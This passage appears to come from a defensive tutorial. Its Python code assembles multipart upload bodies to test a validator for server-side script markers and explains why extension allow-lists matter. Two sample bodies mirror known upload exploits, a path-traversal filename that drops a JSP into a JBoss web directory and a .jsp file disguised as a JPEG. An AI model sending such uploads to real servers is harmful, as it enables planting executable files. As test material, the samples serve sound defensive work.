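            findings.append(f"{field}: content contains server-side script markers")
    return findings


def build_body(boundary: str, parts) -> bytes:
    """Assemble a multipart/form-data body from (field, filename, ctype, payload) tuples."""
    out = b""
    for field, filename, ctype, payload in parts:
        out += f"--{boundary}\r\n".encode()
        disposition = f'Content-Disposition: form-data; name="{field}"'
        if filename is not None:
            disposition += f'; filename="{filename}"'
        out += disposition.encode() + b"\r\n"
        if ctype:
            out += f"Content-Type: {ctype}\r\n".encode()
        out += b"\r\n" + payload + b"\r\n"
    return out + f"--{boundary}--\r\n".encode()


# Constructed sample bodies: the first two mirror entries 194 and 203, the third is a real PNG header.
BOUNDARY = "----WebKitFormBoundaryKNt0t4vBe8cX9rZk"
CONTENT_TYPE = f"multipart/form-data; boundary={BOUNDARY}"
FE_BODY = build_body(BOUNDARY, [
    ("uploadFile", "../../../../../jboss/web/fe.war/hello.jsp", "text/plain", b'<% out.println("hello");%>'),
    ("json", None, None, b'{"iq":{"query":{"UpdateType":"mail"}}}'),
])
EHR_BODY = build_body(BOUNDARY, [("fj_file", "11.jsp", "image/jpeg", b'<% out.print("hello,eHR");%>')])
PNG_BODY = build_body(BOUNDARY, [("photo", "photo.png", "image/png", b"\x89PNG\r\n\x1a\nIHDR-stub")])

if __name__ == "__main__":
    for name, body in (("FE", FE_BODY), ("eHR", EHR_BODY), ("PNG", PNG_BODY)):
        print(name, check_upload(CONTENT_TYPE, body))
```

The magic-byte check only catches a mismatch between the declared image type and the content; the extension allow-list and the server-chosen file name are what stop the upload from ever becoming executable.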